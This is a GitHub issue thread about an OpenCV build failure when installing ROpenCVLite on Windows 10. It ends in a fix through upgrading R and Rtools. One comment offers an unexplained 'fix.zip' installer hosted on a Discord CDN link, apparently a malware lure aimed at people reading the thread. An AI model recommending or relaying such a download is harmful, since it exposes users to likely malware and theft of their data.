### ISSUE TITLE
opencv installation error using ROpenCVLite on win 10

### ISSUE THREAD

**Issue by wzdrgi** [swarm-lab/ROpenCVLite#50]
Hi, I'm having some problems trying to use ROpenCVLite as follows：

R version：4.2.3
ROpenCVLite version : 4.90.2
Cmake version : 3.30.3
Rtools version (Windows only) : 4.2
Rstudio version :  RStudio-2024.04.2-764
Windows : win10

My code is as follows：

> ROpenCVLite::installOpenCV()
OpenCV is not installed on this system. Would you like to install it now? This will take several minutes. 

1: yes
2: no
Selection: 1
OpenCV will be installed in E:/R-4.2.3/library/ROpenCV
Clearing install path.
试开URL’https://github.com/opencv/opencv/archive/4.9.0.tar.gz'
downloaded 88.5 MB
试开URL’https://github.com/opencv/opencv_contrib/archive/4.9.0.tar.gz'
downloaded 57.0 MB
...
...
...
2.0.a(gclosure.c.obj):gclosure.c:(.rdata$.refptr.ffi_type_uint32[.refptr.ffi_type_uint32]+0x0): undefined reference to `ffi_type_uint32'
C:\rtools42\x86_64-w64-mingw32.static.posix\bin/ld.exe: C:/rtools42/x86_64-w64-mingw32.static.posix/lib/libgobject-2.0.a(gclosure.c.obj):gclosure.c:(.rdata$.refptr.ffi_type_sint32[.refptr.ffi_type_sint32]+0x0): undefined reference to `ffi_type_sint32'
collect2.exe: error: ld returned 1 exit status
make[2]: *** [modules/videoio/CMakeFiles/opencv_videoio.dir/build.make:307: bin/libopencv_videoio490.dll] Error 1
make[2]: Leaving directory '/c/Users/wzd/AppData/Local/Temp/Rtmp2RQZFX/opencv-4.9.0/build'
make[1]: *** [CMakeFiles/Makefile2:2994: modules/videoio/CMakeFiles/opencv_videoio.dir/all] Error 2
make[1]: Leaving directory '/c/Users/wzd/AppData/Local/Temp/Rtmp2RQZFX/opencv-4.9.0/build'
make: *** [Makefile:166: all] Error 2
make: Leaving directory '/c/Users/wzd/AppData/Local/Temp/Rtmp2RQZFX/opencv-4.9.0/build'
[1] FALSE

I'd like to know what's wrong and how I can fix him.
Here are my environment variables
![0C31D37DCCC15F9230BCCE259D8BE0DC](https://github.com/user-attachments/assets/3e0366d7-0e27-4773-ac72-ab0860ee56ea)
Complete information is in the attachment
[R error.txt](https://github.com/user-attachments/files/16843160/R.error.txt)

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by sjmgarnier** [comment]
@wzdrgi Thanks for reporting this issue. I'm afraid I can't reproduce it on Windows 10 and 11 with R 4.2.3 and Rtools 4.2. Everything works as intended on my test machines. It might be an incompatibility with something else installed on your system. Do you have the possibility to try the installation on a clean session? This might help narrow down the source of the problem. If not, I suggest trying with the latest version of R (4.4.1) and Rtools (4.4), unless something is forcing you to use the old 4.2.3 version.

**Comment by wzdrgi** [comment]
--   Platform:
--     Timestamp:                   2024-09-03T03:31:07Z
--     Host:                        Windows 6.2.9200 AMD64
--     CMake:                       3.24.1
--     CMake generator:             Unix Makefiles
--     CMake build tool:            C:/rtools42/usr/bin/make.exe
--     Configuration:               RELEASE
Thank you for your reply, as well as I also noticed that in my output there is a message as above, but my Cmake version is 3.30.3, is this the problem? And I found C:\Users\wzd\Downloads\cmake-3.30.3 in my path, but it seems that the version of cmake is still 3.24.1. I'll try R (4.4.1) and Rtools (4.4), as you suggested, and see if the problem persists, thank you again for your reply!

**Comment by sjmgarnier** [comment]
@wzdrgi It's probably because Rtools ships with its own version of Cmake now. I should probably remove that step from the installation instructions.

**Comment by wzdrgi** [comment]
I have tried to run ROpenCVLite::installOpenCV() with only rtools installed. But I wasn't able to proceed to the next step when I had only rtools42 and no cmake installed, I could only start running if cmake was installed

**Comment by wzdrgi** [comment]
Thanks for the reply, it worked under R4.4.1 with Rtools44 version, only one warning remained at the end:In utils::untar(paste0(config$tmp_dir, "/opencv.tar.gz"), exdir = config$tmp_dir) :
  ‘tar.exe -xf "C:/Users/wzd/AppData/Local/Temp/RTMPSM~1/opencv.tar.gz" -C "C:/Users/wzd/AppData/Local/Temp/RTMPSM~1"’ returned error code 1
  I checked with ROpenCVLite::isOpenCVInstalled() and it returned True successfully!Thank you for your patience!

**Comment by sjmgarnier** [comment]
@wzdrgi Thanks for letting me know.
